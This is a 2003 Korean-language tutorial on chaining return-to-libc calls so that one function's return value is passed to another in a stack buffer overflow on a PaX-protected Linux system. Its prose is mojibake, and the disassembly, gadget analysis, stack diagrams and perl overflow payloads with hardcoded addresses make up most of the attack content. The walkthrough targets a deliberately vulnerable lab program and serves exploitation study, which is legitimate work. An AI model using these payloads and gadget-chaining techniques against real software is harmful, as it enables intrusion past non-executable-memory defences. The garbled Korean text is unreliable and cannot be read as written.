Return-to-Lib ̿ Լ ϰ ȣ Լ ϱ Mutacker in (ּ: Null@Root & װ Ʈ ȿ ) mutacker@null2root.org, mutacker@mail.hangkong.ac.kr (http://mutacker.null2root.org) /////////////////////////////////////////////////////////////////////////////////////////////// /////// 1. ⿡ ռ ⿡ ռ ׻ ֽô е鿡 帳ϴ. Ī .. ˼մϴ. __) ŷ ο ̳ ߰ϰ ۾ и ȥڼ س⿡ ġ . , ׻ 翡 Ѻְ, ְ Ƴ ʴ е ֱ⿡ ƴѰ ʹ. ٽ ѹ е鿡 縦 ǥѴ. Ư, 츮 "~ 𳪸(O~ MuNaRiSe)"(?)鲲 帳ϴ. - üҸ Null@Root پ Ұ شϴ ۿ÷ξ ֱ ̴. DZ ϸ, Ѵ. Ʋ κ̳ Ż ο ̳ ּ(irc.null2root.org) ˷ֽñ ٶϴ. ⸸ Ư ø̼ǿ õ exploit ʴ´. ƹɷ, ѱ ̳ ϴ(? ձذ ƴ ) Ŀ鿡, ׸ α׷ ϴ ڵ鿡 ׸ Ǿ ϴ ٷ . ְ http://www.null2root.org̸, Ҵ http://www.khdp.org̴. ٸ 쿡 ó Ȯ ־ ϴ ٷ̴. /////////////////////////////////////////////////////////////////////////////////////////////// /////// 2. Ұ +--------------------------------------------------------------------------------------------------------+ | "Return-to-Lib ̿ , Ų Լ Լ ڷ Ѱ ?" | +--------------------------------------------------------------------------------------------------------+ ް Ʈ ڵ带 ʰ Ű Ǿ. , ̵ 鿡 Լ ϰ Լ ϴ ؼ Ұ ϰ ִ. , ε Լ ϰ ޾Ƽ Լ ڰ Ѱ־ ϴ 쿡 ذ Ϲ ۵ ĿԴ. stack buffer overflow ߻ϴ ȯϿ Return-to-Lib( RTL) ̿Ϸ ϰ Լ Ű ڰ ϴ ҰϷ Ѵ. ۼϿ "Stack buffer overflow ̿Ͽ Text ڵ带 ÷ Ű" Ͽ о Ѵ. -- ȯ (1) ý۰ ü mutacker ~/newdoc> uname -a Linux kof 2.4.20-PaX #2 SMP Sat Feb 22 06:59:22 KST 2003 i686 unknown (2) PaX patch ȯ http://pageexec.virtualave.net PaX patch [*] Paging based non-executable pages [ ] Segmentation based non-executable pages [ ] Emulate trampolines [ ] Restrict mprotect() [ ] Disallow ELF text relocations [ ] Address Space Layout Randomization /////////////////////////////////////////////////////////////////////////////////////////////// ////// 3. // print(add()); ȣ ȿ BoF ̿Ͽ ϶. #include int add() { return 100; } int print(int num) { printf("Good Job : %d\n", num); } int main(int argc, char* argv[]) { char buf[32]; strcpy(buf, argv[1]); printf("buf: %s\n", buf); } print()Լ Ű add()Լ ϰ ޾Ƽ óϴ ̴. , 츮 ˰ ִ Return-to-Lib δ add()Լ ϰ ȹ ִ Ƿ, ̸ ذ ã ߿ϰڴ. /////////////////////////////////////////////////////////////////////////////////////////////// ////// 4. м Ǹ ϳ Լ ٸ Լ ȣ , ϰ ȣ Լ ϰ ɱ? %eax Ϳ ǵ شٴ ̴. ̸ ׸ α׷ Ȯ . mutacker ~/newdoc> cat rettest.c int add(int a, int b) { return a+b; } main() { int c; c = add( 100, 200 ); printf("Number : %d\n", c); } mutacker ~/newdoc> objdump -d rettest ..... 08048470
: 8048470: 55 push %ebp 8048471: 89 e5 mov %esp,%ebp 8048473: 83 ec 08 sub $0x8,%esp 8048476: 83 ec 08 sub $0x8,%esp ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 8048479: 68 c8 00 00 00 push $0xc8 804847e: 6a 64 push $0x64 8048480: e8 db ff ff ff call 8048460 8048485: 83 c4 10 add $0x10,%esp 8048488: 89 c0 mov %eax,%eax 804848a: 89 45 fc mov %eax,0xfffffffc(%ebp) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 804848d: 83 ec 08 sub $0x8,%esp 8048490: ff 75 fc pushl 0xfffffffc(%ebp) 8048493: 68 18 85 04 08 push $0x8048518 8048498: e8 9f fe ff ff call 804833c <_init+0x58> 804849d: 83 c4 10 add $0x10,%esp 80484a0: c9 leave 80484a1: c3 ret ..... ~~~ ~~~ κ ٷ c = add(100, 200); شϴ κ Լ ȣ 804848a: 89 45 fc mov %eax,0xfffffffc(%ebp) κп ϰ(%eax) c شϴ κ 0xfffffffc(%ebp) Ǿ ִ. ! 츮 Լ ϰ %eax͸ ޵Ǿٴ ˾Ҵ. ׷ٸ, Return-to-Lib ȣ Լ ϰ ޵Ǿ ̶ ִ. ̶ %eax ̿ϸ ǰڴٴ ƽ ̴. ׷ٸ, ڵ尡 ƴ RTL ̿ %eax  ȹ ΰ  Լ Ű Ѱ ΰ ǰڴ. ̸ ش α׷ м ణ غ . mutacker ~/newdoc> gcc -o newdoc newdoc.c mutacker ~/newdoc> ldd newdoc libc.so.6 => /lib/i686/libc.so.6 (0x40022000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) Ȳ ش μ εǾ , ΰ ̺귯 Ǿ ̶ ִ. +-----------------------------------------------------------------------------------------+ | "%eax ޸ ϴ ڵ尡 ̺귯 ȿ ұ?" | +-----------------------------------------------------------------------------------------+ ڵ常 Ѵٸ Լ ȣϰ ٷ κп %eax 츮 ϴ ޸ ̵Ű ڵ带 Ű ϴ ۾ ̴. ̸ ̺귯 objdump ̿Ͽ 캸. mutacker ~/newdoc> objdump -d /lib/i686/libc.so.6 .... 00026bd0 <_nl_postload_time>: 26bd0: 55 push %ebp 26bd1: 89 e5 mov %esp,%ebp 26bd3: 53 push %ebx 26bd4: e8 07 fa ff ff call 265e0 <_nl_postload_ctype+0xcc> 26bd9: 81 c3 0b 3e 10 00 add $0x103e0b,%ebx 26bdf: 31 c9 xor %ecx,%ecx 26be1: 31 d2 xor %edx,%edx 26be3: 89 8b 1c 0d 00 00 mov %ecx,0xd1c(%ebx) 26be9: 31 c0 xor %eax,%eax 26beb: 89 93 28 0d 00 00 mov %edx,0xd28(%ebx) 26bf1: 89 83 30 0d 00 00 mov %eax,0xd30(%ebx) 26bf7: 5b pop %ebx 26bf8: 5d pop %ebp 26bf9: c3 ret .... mutacker ~/newdoc> objdump -d /lib/ld-linux.so.2 .... (gdb) disassemble _nl_postload_time Dump of assembler code for function _nl_postload_time: 0x40048bd0 <_nl_postload_time>: push %ebp 0x40048bd1 <_nl_postload_time+1>: mov %esp,%ebp 0x40048bd3 <_nl_postload_time+3>: push %ebx 0x40048bd4 <_nl_postload_time+4>: call 0x400485e0 <_nl_postload_ctype+204> 0x40048bd9 <_nl_postload_time+9>: add $0x103e0b,%ebx 0x40048bdf <_nl_postload_time+15>: xor %ecx,%ecx 0x40048be1 <_nl_postload_time+17>: xor %edx,%edx 0x40048be3 <_nl_postload_time+19>: mov %ecx,0xd1c(%ebx) 0x40048be9 <_nl_postload_time+25>: xor %eax,%eax 0x40048beb <_nl_postload_time+27>: mov %edx,0xd28(%ebx) 0x40048bf1 <_nl_postload_time+33>: mov %eax,0xd30(%ebx) 0x40048bf7 <_nl_postload_time+39>: pop %ebx 0x40048bf8 <_nl_postload_time+40>: pop %ebp 0x40048bf9 <_nl_postload_time+41>: ret End of assembler dump. _nl_postload_time ̺귯 Լ ( ãҴ -_-) 츮 ʿ κ Ʒ κп شѴ. 26bf1: 89 83 30 0d 00 00 mov %eax,0xd30(%ebx) -- (1) 26bf7: 5b pop %ebx -- (2) 26bf8: 5d pop %ebp -- (3) 26bf9: c3 ret -- (4) (1) %eax %ebxͰ Ű κ 0xd30 شϴ ϴ κ̴. %ebx 0xbffff2c0 0xd30 ġ ǹǷ 0xbffffff0 ּҿ %eax ִٴ ǹ̰ ǰڴ. 嵥, %ebx  ٲ ΰ? ٷ (2) ִ. (2) û %esp Ű %ebx ̴. 츮 %esp ִٸ, Ư ޸ ġ 0xbffff2c0 ڽ ϴ ޸ ּҰ ־ΰ (2) Ǹ %ebxͿ ϴ ־ ִ ̴. ϴ 帧 (2) ǰ (1) Ǿ , ̸ RTL ̿ 쿡 ʱ , (2), (3), (4) ϰ, ٽ (1), (2), (3), (4) Ű ǰڴ. ü α׷ 帧 26bf7: 5b pop %ebx -- (2) 26bf8: 5d pop %ebp -- (3) 26bf9: c3 ret -- (4) 26bf1: 89 83 30 0d 00 00 mov %eax,0xd30(%ebx) -- (1)' 26bf7: 5b pop %ebx -- (2)' 26bf8: 5d pop %ebp -- (3)' 26bf9: c3 ret -- (4)' ̷ ǰڴ. (4) ּҸ (1)' ν 帧 Ƿ ū Ÿ ̴. ׷ Ȳ ؼ  ٸ? popɾ retɾ %esp Ͱ 4 . , pop ret ؼ %esp ǹǷ ׿ û ־θ ǰڴ. , ñ Ʒ صθ 츮 ϴ %eax ̴. | | +---------------------------------+ | %eax ּ - 0xd30 | <- pop %ebx : %ebx +---------------------------------+ | %ebp (߿ ) | <- pop %ebp : %ebp +---------------------------------+ |(1)' ޸ ּҰ(0x40048bf1) | <- ret +---------------------------------+ | %ebx (߿ ) | <- pop %ebx : %ebx +---------------------------------+ | %ebp ( leave chain ) | <- pop %ebp : %ebp +---------------------------------+ | ڵ忡 شϴ ּ | <- ret +---------------------------------+ | | 츮 ϴ ̺귯 ִ Ư ڵ带 ̿Ͽ %eax Ư ޸𸮷 ִ 캸Ҵ. /////////////////////////////////////////////////////////////////////////////////////////////// ////// 5. :) ׷ ణ Ͽ Ư ޸ %eax Ǿ° Ȯ غ . ̸ ϶ dumpcode ̿ϵ ϰڴ. mutacker ~/newdoc> cat tnewdoc.c #include #include "dumpcode.h" int add() { return 100; } int print(int num) { printf("%d\n", num); } int main(int argc, char* argv[]) { char buf[32]; strcpy(buf, argv[1]); printf("buf: %s\n", buf); dumpcode((char*)0xbffffff0, 16); } void test() { dumpcode((char*)0xbffffff0, 16); } mutacker ~/newdoc> objdump -d ./tnewdoc | grep "" 08048704 : mutacker ~/newdoc> objdump -d ./tnewdoc | grep "" 08048774 : 츮 BoF return address add ּ 0x08048704 ϰ, ϰ, ش ޸𸮰 Ǿ Ȯϱ test ǵ ̴. mutacker ~/newdoc> ./tnewdoc `perl -e 'print "A"x44, "\x04\x87\x04\x08", "\xf7\x8b\x04\x40", "\xc0\xf2\xff\xbf"x2, "\xf1\x8b\x04\x40", "\x74\x87\x04\x08"x3'` buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??@??@t? t?t? 0xbffffff0 63 00 2e 2f 74 6e 65 77 64 6f 63 00 00 00 00 00 c../tnewdoc..... ~~~~~~~~~~~ 0xbffffff0 64 00 00 00 74 6e 65 77 64 6f 63 00 00 00 00 00 d...tnewdoc..... ~~~~~~~~~~~ Segmentation fault (core dumped) mutacker ~/newdoc> Ϳ!! 츮 ּҿ Ǿ Ȯ ִ. "\xc0\xf2\xff\xbf" ==> 0xbffff2c0 == 0xbffffff0 - 0xd30 0x00000064 == 100 츮 ⿡ testԼ ּ print ּҸ ־. ׸, print ּҰ  + 4 ġ Ű  ̸, ̰ ּҰ "\xc0\xf2\xff\xbf" κп üϸ ̴. !! α׷ ̿Ͽ ׽Ʈ غ. mutacker ~/newdoc> objdump -d ./newdoc | grep "" 08048490 : mutacker ~/newdoc> objdump -d ./newdoc | grep "" 0804849c : mutacker ~/newdoc> ./newdoc `perl -e 'print "A"x44, "\x90\x84\x04\x08", "\xf7\x8b\x04\x40", "\xc0\xf2\xff\xbf"x2, "\xf1\x8b\x04\x40", "\xaa\xaa\xaa\xaa", "\xbb\xbb\xbb\xbb", "\x9c\x84\x04\x08", "XXXX", "YYYY"'` buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@??@ Good Job : 0 Segmentation fault (core dumped) mutacker ~/newdoc> gdb newdoc core -q Core was generated by `./newdoc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@? ?@'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x4003e11c in __libc_start_main (main=Cannot access memory at address 0xbbbbbbc3 ) at ../sysdeps/generic/libc-start.c:77 77 ../sysdeps/generic/libc-start.c: No such file or directory. in ../sysdeps/generic/libc-start.c (gdb) info reg $ebx $ebp ebx 0xaaaaaaaa -1431655766 ebp 0xbbbbbbbb 0xbbbbbbbb gdb ̿ 캸 츮 Ų ڵ忡 ebx ebp Ǿ Ȯ ִ. Էºκп "YYYY" شϴ û ּҰ ˾Ƴ ߿, ⿡ brute force ̿ϵ ϰڴ. mutacker ~/newdoc> ./newdoc `perl -e 'print "A"x44, "\x90\x84\x04\x08", "\xf7\x8b\x04\x40", "\xf0\xee\xff\xbf"x2, "\xf1\x8b\x04\x40", "\xaa\xaa\xaa\xaa", "\xbb\xbb\xbb\xbb", "\x9c\x84\x04\x08", "XXXX", "YYYY"'` buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@??@ XXXXYYYY Good Job : 100 Segmentation fault (core dumped) mutacker ~/newdoc> print Ű ġ 0xbffffc20 ̾, 0xd30ŭ Ǿ ϱ 0xbfffeef0 ԷϿ. /////////////////////////////////////////////////////////////////////////////////////////////// ////// 5. Return-to-Lib ̿ , Լ ϰ Լ Ű ϴ ̰ ִ. ̸ Return-to-Lib ̿Ͽ ε ڵ峪 ̿ Լ ϰ ޾ Լ Ǿµ ʼ ׿ ó . ̸ ̿ ϳ ̵ ϰڴ. :) λ Ѱμ 𸣰ڴ. :) ׷ е ǽ 鼭.. /////////////////////////////////////////////////////////////////////////////////////////////// ////// 6. 1. Stack buffer overflow ̿Ͽ Text ڵ带 ÷ Ű?: http://www.kof.co.kr/breakpax.txt 2. The advanced return-into-lib(c) exploits : phrack 58-4 3. Ÿ bof۵ ^^